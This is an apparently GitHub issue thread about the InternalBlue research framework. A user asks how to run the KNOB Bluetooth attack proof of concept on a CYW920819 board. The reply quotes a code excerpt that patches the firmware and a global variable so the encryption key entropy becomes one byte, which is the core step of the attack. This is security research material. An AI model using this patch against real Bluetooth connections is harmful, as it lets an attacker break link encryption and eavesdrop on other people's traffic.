jiska2342
commented
3 years ago Technically yes, but you need to extract two addresses from the ROM and match them to adapt this part of the POC:
https://github.com/seemoo-lab/internalblue/blob/master/examples/eval_cyw20735/KNOB_PoC.py#L37
# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A) # connection struct key entropy
internalblue.patchRom(Address(0x7402A), patch)
# modify global variable for own setting
internalblue.writeMem(0x280F13, b'\x01') # global key entropy
Hi
I have a CYW920819EVB-02 board and want to use it to perform KNOB attack. However, I notice that there isn't any code suitable for this board. I wonder if I can just run the code for CYW20735?
Many thanks